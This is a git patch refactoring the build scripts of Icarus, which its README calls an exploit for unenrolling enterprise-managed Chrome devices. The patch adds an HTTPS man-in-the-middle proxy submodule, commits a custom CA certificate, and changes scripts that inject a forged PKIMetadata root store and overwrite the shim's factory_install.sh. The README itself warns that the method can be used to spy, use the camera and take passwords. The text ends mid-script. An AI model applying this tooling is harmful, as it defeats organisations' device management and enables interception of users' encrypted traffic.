From 8f088c70864e648f171f949eb93d97d8d7678c7b Mon Sep 17 00:00:00 2001 From: kxtzownsu Date: Sun, 9 Mar 2025 20:16:28 +0000 Subject: [PATCH] refactor --- .gitignore | 1 - .gitmodules | 3 +++ Makefile | 20 +++++++++++++------- README.md | 13 +++++++++---- httpmitm | 1 + modify.sh | 5 +++-- myCA.der | Bin 0 -> 951 bytes scripts/create_out.sh | 20 ++++++++++---------- scripts/venv.sh | 6 +++++- 9 files changed, 44 insertions(+), 25 deletions(-) create mode 160000 httpmitm create mode 100644 myCA.der diff --git a/.gitignore b/.gitignore index 82d1b8f..feab0d7 100644 --- a/.gitignore +++ b/.gitignore @@ -4,6 +4,5 @@ gen original out *pb2.py -myCA.* *.bin *.bin.old diff --git a/.gitmodules b/.gitmodules index e69de29..3b9c408 100644 --- a/.gitmodules +++ b/.gitmodules @@ -0,0 +1,3 @@ +[submodule "httpmitm"] + path = httpmitm + url = https://git.kxtz.dev/kxtzownsu/Icarus-Lite.git diff --git a/Makefile b/Makefile index d0e1153..e7fbeff 100644 --- a/Makefile +++ b/Makefile @@ -1,14 +1,14 @@ venv: - bash venv.sh + bash scripts/venv.sh setup-python: mkdir -p gen/python protoc --python_out=gen/python proto/crs.proto protoc --python_out=gen/python proto/pins.proto - protoc --python_out=gen/python cproto/t.proto - cp gen/python/crs_pb2.py src/root_store_gen - cp gen/python/pins_pb2.py src/root_store_gen - cp gen/python/ct_pb2.py src/root_store_gen + protoc --python_out=gen/python proto/ct.proto + cp gen/python/proto/crs_pb2.py src/root_store_gen + cp gen/python/proto/pins_pb2.py src/root_store_gen + cp gen/python/proto/ct_pb2.py src/root_store_gen exit build-packed-data: @@ -16,12 +16,18 @@ build-packed-data: make venv make setup-python +ca-keys: + cd httpmitm; bash generate_certs.sh + clean: rm -rf out/ + rm -rf original/ + rm -rf gen + rm -rf .venv/ + rm -rf src/root_store_gen/*_pb2.py start-server: bash -c "while tmux has-session -t icarus; do tmux kill-session -t icarus; done" echo "set -g mouse on" > ~/.tmux.conf - tmux new -d -s icarus "cd httpmitm; bash start_proxy.sh" - tmux splitw -t icarus -h "cd httpmitm/dmbackend; bash start_server.sh" + tmux new -d -s icarus "cd httpmitm; bash start.sh" tmux a -t icarus diff --git a/README.md b/README.md index 70a9b73..18f8183 100644 --- a/README.md +++ b/README.md @@ -7,24 +7,28 @@ An exploit for Chrome devices which allows people to unenroll devices with devic > ANYTHING GOOGLE CAN REMOTELY PERFORM ON YOUR DEVICE, ICARUS CAN BE USED TO DO. AN EXAMPLE OF THIS IS INSTALL EXTENSIONS, SPY, USE YOUR CAMERA, REMOTE INTO YOUR DEVICE, GET YOUR PASSWORDS, AND MORE.

> ONLY SELF HOST ICARUS, NEVER USE A PUBLIC SERVER! + + ## Setup and installation instructions Clone the repo with ``git clone --recursive https://git.kxtz.dev/kxtzownsu/icarus/` and change directory to it. Set up the environment by running the following commands (Make sure you have python3, python3-venv, and protobuf installed beforehand): -- `make venv` - `make build-packed-data` -- `make ca-keys` Before continuing, open Chrome on your build machine and go to chrome://components. Press CTRL + F and search for "PKIMetadata". Once you find it, press "Check for Updates". Make sure it says up-to-date before continuing (and that the version is below 9999.) -- `bash create_out.sh myCA.der` +- `bash scripts/create_out.sh myCA.der` After doing this the output directory (from here on reffered to as PKIMetadata) will be generated, which is the custom Certificate Authority. Now, to modify the shim with the generated PKIMetadata: -- `bash modify.sh ` +- `sudo bash modify.sh ` Now boot the shim, and Icarus will attempt to modify your stateful partition. @@ -58,6 +62,7 @@ Reboot the device. You'll boot into verified mode. Once you have your server run ## New Credits - [kxtzownsu](https://github.com/kxtzownsu) - rolling ssl keys, maintaining this fork :D +- [cosmicdevv](https://github.com/cosmicdevv) - creating icarus lite ## Original Credits - [MunyDev](https://github.com/MunyDev) - Creating this exploit diff --git a/httpmitm b/httpmitm new file mode 160000 index 0000000..0f4de4c --- /dev/null +++ b/httpmitm @@ -0,0 +1 @@ +Subproject commit 0f4de4c0533f5026ae95e3264d83fe4a13b98a37 diff --git a/modify.sh b/modify.sh index c2c76eb..897c669 100644 --- a/modify.sh +++ b/modify.sh @@ -1,5 +1,5 @@ #!/bin/bash - +SCRIPT_DIR=$(readlink -f "$(dirname "$0")") # Copyright 2019 The ChromiumOS Authors # Use of this source code is governed by a BSD-style license that can be @@ -87,10 +87,11 @@ mkdir -p "$MOUNT_DIR"/usr/bin umount "$MOUNT_DIR" enable_rw_mount "$LOOP_DEV"p3 mount "$LOOP_DEV"p3 "$MOUNT_DIR" -cp "inshim.sh" "$MOUNT_DIR/usr/sbin/factory_install.sh" +cp "$SCRIPT_DIR/scripts/inshim.sh" "$MOUNT_DIR/usr/sbin/factory_install.sh" chmod +x "$MOUNT_DIR/usr/sbin/factory_install.sh" umount "$MOUNT_DIR" +losetup -D sync sync sync diff --git a/myCA.der b/myCA.der new file mode 100644 index 0000000000000000000000000000000000000000..53e2e1e2403f64e9b6c0e2127dd285e093485519 GIT binary patch literal 951 zcmXqLV%}`f#58*WGZP~dlZX#PeedkjRS7Oz^E!$`I#b_0`1Q?zmyJ`a&7zsAwP$66E5M@XRYoEy_zR zQ3%gWNzW`PRtPAmRPZTDF;p^8fSb$7C?=d;QBsv(o>yGzke-{EnWLASpKBl|&TC|9 zU~FJ%XlZIqgRYixkTrKeMx7?qF%f{~ShxrvdV!Jvtei>Zl`kzvsR@#RG!RSC@7 zr9ywZE}OpCb;X-Kb^4O=O*T5oFCN8RUh>iED?i1v_osg|^6d-aJ&O@nyl9Iz1NC7b+QIrFqRo|96W;d@2q7YIIMc#A8?EcAJzb z=6~uF_!xi5JVi0S}ng#i)wj4p4zsm%}j#vh70?|KaDS*7nH8< zS>Pur%N)GahGP}bGiP@Oh2SbOq=%Kx6fx{ zW@KPo9BdG1APbCnSw0pq7LoYeC;O*7%2{&j&kT!3U2#5*$2%jz2}4$yMZ!R=0lNZz zkbYrC#{Vp=2FySTIoN^e4;bu>3|f-@(tLNjKYTYi9#G$3^ei)Bx=z_{A90C~<-Gr< zM+!}Sym*g2kp z9rIN)=9>$}d(Lc6>N|8#Li%s>#}&)FpNbW$l<__7c``S5+K0?ycb+F7H@$W--mv~v zQT$V#mo`TXW-YH`xwW17tIxqOF>l@iw(n8Ss`;gsXN7!ED%>pLI^6D6&cVF*^p%2h iQ&??`?#|>nYB{ZTLGh8R9UteG=IY(!&3U&h)*S#ue`wbL literal 0 HcmV?d00001 diff --git a/scripts/create_out.sh b/scripts/create_out.sh index b26bd06..37f32c3 100755 --- a/scripts/create_out.sh +++ b/scripts/create_out.sh @@ -18,7 +18,7 @@ echo "using chrome ${CHROME:="google-chrome"}" if [ ! -d "$HOME/.config/$CHROME/PKIMetadata" ] then echo "Opened chrome automatically, make sure you follow the README!" - "$CHROME" chrome://components &> /dev/null & + "$CHROME" chrome://components # &> /dev/null & exit 0 fi HIGHESTVERSIONAPPARENTLY=$(find "$HOME/.config/$CHROME/PKIMetadata/" -maxdepth 1 -mindepth 1 -type d| head -n 1) @@ -38,21 +38,21 @@ rm -rvf original/PKIMetadata/9999/_metadata rm -rvf original/PKIMetadata/9999/manifest.fingerprint # Copy all directories, and will be modified by future calls -rm -rvf "${SCRIPT_DIR}"/out -mkdir "${SCRIPT_DIR}"/out -mkdir -p "${SCRIPT_DIR}"/out/PKIMetadata/. -cp -rvf "${SCRIPT_DIR}"/original/PKIMetadata/9999/. "${SCRIPT_DIR}"/out/PKIMetadata -rm -rvf "${SCRIPT_DIR}"/out/PKIMetadata/_metadata # verified contents not necessary -rm -rvf "${SCRIPT_DIR}out/PKIMetadata/"*.fingerprint -python3 ./src/root_store_gen/generate_new_pbs.py "${SCRIPT_DIR}/original/PKIMetadata/9999/crs.pb" "$@" "${SCRIPT_DIR}/out/PKIMetadata/crs.pb" +rm -rvf "${SCRIPT_DIR}"/../out +mkdir "${SCRIPT_DIR}"/../out +mkdir -p "${SCRIPT_DIR}"/../out/PKIMetadata/. +cp -rvf "${SCRIPT_DIR}"/../original/PKIMetadata/9999/. "${SCRIPT_DIR}"/../out/PKIMetadata +rm -rvf "${SCRIPT_DIR}"/../out/PKIMetadata/_metadata # verified contents not necessary +rm -rvf "${SCRIPT_DIR}/../out/PKIMetadata/"*.fingerprint +python3 ./src/root_store_gen/generate_new_pbs.py "${SCRIPT_DIR}/../original/PKIMetadata/9999/crs.pb" "$@" "${SCRIPT_DIR}/../out/PKIMetadata/crs.pb" # Modify version in manifest python3 <